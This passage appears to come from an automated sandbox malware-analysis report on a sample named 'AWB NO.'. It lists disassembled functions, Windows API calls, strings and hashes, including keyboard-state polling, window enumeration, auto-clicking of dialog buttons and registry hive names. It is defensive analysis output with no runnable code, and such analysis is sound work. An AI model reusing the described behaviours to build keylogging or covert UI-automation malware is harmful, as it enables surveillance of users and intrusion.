                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                              • String ID: 0
                                                              • API String ID: 1026556194-4108050209
                                                              • Opcode ID: 3b22527250bb857676f033400117c0a4a589467c0e3a6cbd12af7d2930364d0d
                                                              • Instruction ID: 044de7e4dd35a86088de80346c1f5ac2e8e2e031d82544e17b68ab28cbecaa44
                                                              • Opcode Fuzzy Hash: 3b22527250bb857676f033400117c0a4a589467c0e3a6cbd12af7d2930364d0d
                                                              • Instruction Fuzzy Hash: A1818E70608311AFDB10EF15C984A6FBBE8FB88314F104D2EF995A3291D774D905CBAA
                                                              Function 004810A5 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00480038,?,?), ref: 004810BC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: BuffCharUpper
                                                              • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                              • API String ID: 3964851224-909552448
                                                              • Opcode ID: 49435cde43217b087a11d2c00bd5a2123b7dea488265586aa8398591abf3c7f8
                                                              • Instruction ID: 88389359f98c9660e251b743cdbb8ea94c24b57ab6fd2e1b5df4b40edaf02939
                                                              • Opcode Fuzzy Hash: 49435cde43217b087a11d2c00bd5a2123b7dea488265586aa8398591abf3c7f8
                                                              • Instruction Fuzzy Hash: 7C41A23021025A8FDF10FF91D8909EF3368EF15344F40486BEC91672A2DB78A917CBA9
                                                              Function 00465569 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 004655D2
                                                              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 004655E8
                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 004655F9
                                                              • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0046560B
                                                              • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0046561C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: SendString
                                                              • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                              • API String ID: 890592661-1007645807
                                                              • Opcode ID: 3a9452b80133d29a36de1d33652f02739a6eb89e8620773832276c0ac014e26d
                                                              • Instruction ID: 68fb84bb15ae9a695f4df20fb78c4172828bcb64e514a9d34bf5732b9d8ca5cc
                                                              • Opcode Fuzzy Hash: 3a9452b80133d29a36de1d33652f02739a6eb89e8620773832276c0ac014e26d
                                                              • Instruction Fuzzy Hash: FB119030A6016979D720B666CC4AEFF7ABCEF95B04F50042BB805A20D1EA781D05C9BA
                                                              Function 00465217 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • timeGetTime.WINMM ref: 0046521C
                                                                • Part of subcall function 00420719: timeGetTime.WINMM(?,75A79610,00410FF9), ref: 0042071D
                                                              • Sleep.KERNEL32(0000000A), ref: 00465248
                                                              • EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 0046526C
                                                              • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0046528E
                                                              • SetActiveWindow.USER32 ref: 004652AD
                                                              • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 004652BB
                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 004652DA
                                                              • Sleep.KERNEL32(000000FA), ref: 004652E5
                                                              • IsWindow.USER32 ref: 004652F1
                                                              • EndDialog.USER32(00000000), ref: 00465302
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                              • String ID: BUTTON
                                                              • API String ID: 1194449130-3405671355
                                                              • Opcode ID: 98ddb0703cd61d87628edcf0d98f7d375aff7407ac3e624b6a34ef0c4065cd16
                                                              • Instruction ID: cd7097472c257bb23b584a981be65a72fabdbfa26ce45d940019a60a8d0d7c0a
                                                              • Opcode Fuzzy Hash: 98ddb0703cd61d87628edcf0d98f7d375aff7407ac3e624b6a34ef0c4065cd16
                                                              • Instruction Fuzzy Hash: 2421A474204704BFE7405F20ED88F2A3B69EB4578AF10187EF402922B1EB699C459F2F
                                                              Function 004045DF Relevance: 18.2, APIs: 12, Instructions: 215windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetMenuItemCount.USER32(004C6890), ref: 0043D7CD
                                                              • GetMenuItemCount.USER32(004C6890), ref: 0043D87D
                                                              • GetCursorPos.USER32(?), ref: 0043D8C1
                                                              • SetForegroundWindow.USER32(00000000), ref: 0043D8CA
                                                              • TrackPopupMenuEx.USER32(004C6890,00000000,?,00000000,00000000,00000000), ref: 0043D8DD
                                                              • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0043D8E9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                              • String ID:
                                                              • API String ID: 36266755-0
                                                              • Opcode ID: 9490ec5a4a562f1e19a84607bd5d48b970607660fc041d08b13ba27c1a5a2ef6
                                                              • Instruction ID: 6ad6198a349bf1976c625735b1d5f841e5fdeefb3eec3c97a7380737a116b5bf
                                                              • Opcode Fuzzy Hash: 9490ec5a4a562f1e19a84607bd5d48b970607660fc041d08b13ba27c1a5a2ef6
                                                              • Instruction Fuzzy Hash: 6B713A70A00205BEEB209F15EC45FAABF64FF48358F200227F525662D1C7B96810DB59
                                                              Function 0046052C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetKeyboardState.USER32(?), ref: 004605A7
                                                              • SetKeyboardState.USER32(?), ref: 00460612
                                                              • GetAsyncKeyState.USER32(000000A0), ref: 00460632
                                                              • GetKeyState.USER32(000000A0), ref: 00460649
                                                              • GetAsyncKeyState.USER32(000000A1), ref: 00460678
                                                              • GetKeyState.USER32(000000A1), ref: 00460689
                                                              • GetAsyncKeyState.USER32(00000011), ref: 004606B5
                                                              • GetKeyState.USER32(00000011), ref: 004606C3
                                                              • GetAsyncKeyState.USER32(00000012), ref: 004606EC
                                                              • GetKeyState.USER32(00000012), ref: 004606FA
                                                              • GetAsyncKeyState.USER32(0000005B), ref: 00460723
                                                              • GetKeyState.USER32(0000005B), ref: 00460731
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: State$Async$Keyboard
                                                              • String ID:
                                                              • API String ID: 541375521-0
                                                              • Opcode ID: f2f36dec6c4a46bfceebef3e5bbc60e354e372eebad2095a13b7bb07ab711d72
                                                              • Instruction ID: d70e1bade3edcafa3224126adcd65a49494c39be54c13286bda3ce7ebf6ec1a5
                                                              • Opcode Fuzzy Hash: f2f36dec6c4a46bfceebef3e5bbc60e354e372eebad2095a13b7bb07ab711d72
                                                              • Instruction Fuzzy Hash: F551AA60A0479429FB35DBA084557EBAFB49F11380F08459F95C2572C2FA5C9A8CCB5B
                                                              Function 0045C72A Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDlgItem.USER32(?,00000001), ref: 0045C746
                                                              • GetWindowRect.USER32(00000000,?), ref: 0045C758
                                                              • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0045C7B6
                                                              • GetDlgItem.USER32(?,00000002), ref: 0045C7C1
                                                              • GetWindowRect.USER32(00000000,?), ref: 0045C7D3
                                                              • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0045C827
                                                              • GetDlgItem.USER32(?,000003E9), ref: 0045C835
                                                              • GetWindowRect.USER32(00000000,?), ref: 0045C846
                                                              • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0045C889
                                                              • GetDlgItem.USER32(?,000003EA), ref: 0045C897
                                                              • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0045C8B4
                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0045C8C1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Window$ItemMoveRect$Invalidate
                                                              • String ID:
                                                              • API String ID: 3096461208-0
                                                              • Opcode ID: ee900cb0418c209eff2971d5848f65fb009066793c70c2948a602d6ec38bc7ab
                                                              • Instruction ID: 20628bd5887914f4131c215851d3afbb63228a24f6148e02c9e6462ef7cb0285
                                                              • Opcode Fuzzy Hash: ee900cb0418c209eff2971d5848f65fb009066793c70c2948a602d6ec38bc7ab
                                                              • Instruction Fuzzy Hash: 54517171B00205AFDB08DFA8DD89AAEBBB6EB88311F14853DF915E7291D7709D04CB14
                                                              Function 0040201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00401B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00402036,?,00000000,?,?,?,?,004016CB,00000000,?), ref: 00401B9A
                                                              • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 004020D3
                                                              • KillTimer.USER32(-00000001,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0040216E
                                                              • DestroyAcceleratorTable.USER32(00000000), ref: 0043BEF6
                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0043BF27
                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0043BF3E
                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0043BF5A
                                                              • DeleteObject.GDI32(00000000), ref: 0043BF6C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                              • String ID:
                                                              • API String ID: 641708696-0
                                                              • Opcode ID: 35d17ce7a2f1df5f60f967835c01b70b65e62aa590bc2f80f7e0e1f3cdd6ee0b
                                                              • Instruction ID: 62d4407ef01395a22b5ebf1233624f5b0999fc02156c59d6ff76a6043205edb2
                                                              • Opcode Fuzzy Hash: 35d17ce7a2f1df5f60f967835c01b70b65e62aa590bc2f80f7e0e1f3cdd6ee0b
                                                              • Instruction Fuzzy Hash: 55616B34101610DFD725AF14CE48B2A77F1FF44315F11993EE642A6AE0C7B9A881DF99
                                                              Function 004021A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 004025DB: GetWindowLongW.USER32(?,000000EB), ref: 004025EC
                                                              • GetSysColor.USER32(0000000F), ref: 004021D3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: ColorLongWindow
                                                              • String ID:
                                                              • API String ID: 259745315-0
                                                              • Opcode ID: cdac9cb2508351c8145c21bbd88bb5245f40cba3cfb8a0d4cbe4db6e4b3f4d31
                                                              • Instruction ID: 47503e6e8c25a14c6d04473920290e3c3a9e3a2f6008e0ea463bb1cae73e411f
                                                              • Opcode Fuzzy Hash: cdac9cb2508351c8145c21bbd88bb5245f40cba3cfb8a0d4cbe4db6e4b3f4d31
                                                              • Instruction Fuzzy Hash: FD41D731000140AFDF215FA8DC8CBBA3765EB46331F1446BAFD65AA2E2C7758C86DB59
                                                              Function 0045AA64 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273windowtimeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetClassNameW.USER32(?,?,00000100), ref: 0045AAA5
                                                              • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0045ABAE
                                                              • GetClassNameW.USER32(?,?,00000400), ref: 0045AC21
                                                              • GetDlgCtrlID.USER32(?), ref: 0045AC73
                                                              • GetWindowRect.USER32(?,?), ref: 0045ACA9
                                                              • GetParent.USER32(?), ref: 0045ACC7
                                                              • ScreenToClient.USER32(00000000), ref: 0045ACCE
                                                              • GetClassNameW.USER32(?,?,00000100), ref: 0045AD48
                                                              • GetWindowTextW.USER32(?,?,00000400), ref: 0045AD82
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout
                                                              • String ID: %s%u
                                                              • API String ID: 1412819556-679674701
                                                              • Opcode ID: ab3c6b164dfd8a154e612d1013b201764bbe00ea740bd9184c9cbe4747541a64
                                                              • Instruction ID: d35ec86bbcbeb73e35131cf7d28b7f07d5205fc7c70a866cb5f2956c045b87af
                                                              • Opcode Fuzzy Hash: ab3c6b164dfd8a154e612d1013b201764bbe00ea740bd9184c9cbe4747541a64
                                                              • Instruction Fuzzy Hash: FDA1E471204206ABD715DF20C884BABB7E9FF44306F00462EFD9992252D738E96DCB96
                                                              Function 0045B397 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 249COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetClassNameW.USER32(00000008,?,00000400), ref: 0045B3DB
                                                              • GetWindowTextW.USER32(00000001,?,00000400), ref: 0045B414
                                                              • CharUpperBuffW.USER32(?,00000000), ref: 0045B431
                                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 0045B498
                                                              • GetWindowTextW.USER32(00000002,?,00000400), ref: 0045B4CF
                                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 0045B518
                                                              • GetClassNameW.USER32(00000010,?,00000400), ref: 0045B550
                                                              • GetWindowRect.USER32(00000004,?), ref: 0045B5B9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: ClassName$Window$Text$BuffCharRectUpper
                                                              • String ID: @$ThumbnailClass
                                                              • API String ID: 3725905772-1539354611
                                                              • Opcode ID: 875a456a40bfa8c1df669ce3342ceba3be6c751550a2306b7669bd1a9e6e8420
                                                              • Instruction ID: 240f2515f7d8b055f070d9f97ff281d4f8d57ffbed57100c70ef1838547da153
                                                              • Opcode Fuzzy Hash: 875a456a40bfa8c1df669ce3342ceba3be6c751550a2306b7669bd1a9e6e8420
                                                              • Instruction Fuzzy Hash: 2181AD71004209ABDB14DF11C881FAB77E8EF4431AF14856EFD859A193EB38DD49CBA9
                                                              Function 0048C27C Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 149windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                                • Part of subcall function 00402344: GetCursorPos.USER32(?), ref: 00402357
                                                                • Part of subcall function 00402344: ScreenToClient.USER32(004C67B0,?), ref: 00402374
                                                                • Part of subcall function 00402344: GetAsyncKeyState.USER32(00000001), ref: 00402399
                                                                • Part of subcall function 00402344: GetAsyncKeyState.USER32(00000002), ref: 004023A7
                                                              • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 0048C2E4
                                                              • ImageList_EndDrag.COMCTL32 ref: 0048C2EA
                                                              • ReleaseCapture.USER32 ref: 0048C2F0
                                                              • SetWindowTextW.USER32(?,00000000), ref: 0048C39A
                                                              • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0048C3AD
                                                              • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 0048C48F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                              • String ID: @GUI_DRAGFILE$@GUI_DROPID$prL$prL
                                                              • API String ID: 1924731296-740887564
                                                              • Opcode ID: 398d21b186235c8079feae2afacecc7bd651b9eaa4a8040518fb50c0c741281f
                                                              • Instruction ID: dc367e10a39d425f30cb391b84f58576d3d09b44280b1156dac04409bcc5156d
                                                              • Opcode Fuzzy Hash: 398d21b186235c8079feae2afacecc7bd651b9eaa4a8040518fb50c0c741281f
                                                              • Instruction Fuzzy Hash: 7451A170204304AFD700EF24C895F6E77E5FB88314F00892EF555972E1DB78A948DB6A
                                                              Function 0046A45A Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 102fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0046A47A
                                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 0046A4D9
                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0046A4FE
                                                              • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0046A58E
                                                              • CloseHandle.KERNEL32(00000000), ref: 0046A599
                                                              • RemoveDirectoryW.KERNEL32(?), ref: 0046A5A2
                                                              • CloseHandle.KERNEL32(00000000), ref: 0046A5AC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove
                                                              • String ID: :$\$\??\%s
                                                              • API String ID: 3827137101-3457252023
                                                              • Opcode ID: 5f33faa08cb701eabbd1d6ffb6acf6de227f701ccc96ef5130cbe269c31a5bbd
                                                              • Instruction ID: 6c28acaa41771e45f4dd62128d4a585676a8276a6c1e95ceaff3c4baf32f5ede
                                                              • Opcode Fuzzy Hash: 5f33faa08cb701eabbd1d6ffb6acf6de227f701ccc96ef5130cbe269c31a5bbd
                                                              • Instruction Fuzzy Hash: BF31A271600119ABDB20DFA1DC48FEF73BCEF88701F1040BAF909D2150EB7496548B29
                                                              Function 0048772A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 004877CD
                                                              • CreateCompatibleDC.GDI32(00000000), ref: 004877D4
                                                              • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 004877E7
                                                              • SelectObject.GDI32(00000000,00000000), ref: 004877EF
                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 004877FA
                                                              • DeleteDC.GDI32(00000000), ref: 00487803
                                                              • GetWindowLongW.USER32(?,000000EC), ref: 0048780D
                                                              • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00487821
                                                              • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0048782D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                              • String ID: static
                                                              • API String ID: 2559357485-2160076837
                                                              • Opcode ID: 6f0489881310945f92dee3f97a2ff10f2881b7c0a52752e23ccb045f92862502
                                                              • Instruction ID: 789ec3a4cb580d3187b1e0f25c444e25d791e636f2d83489152635d906d596f6
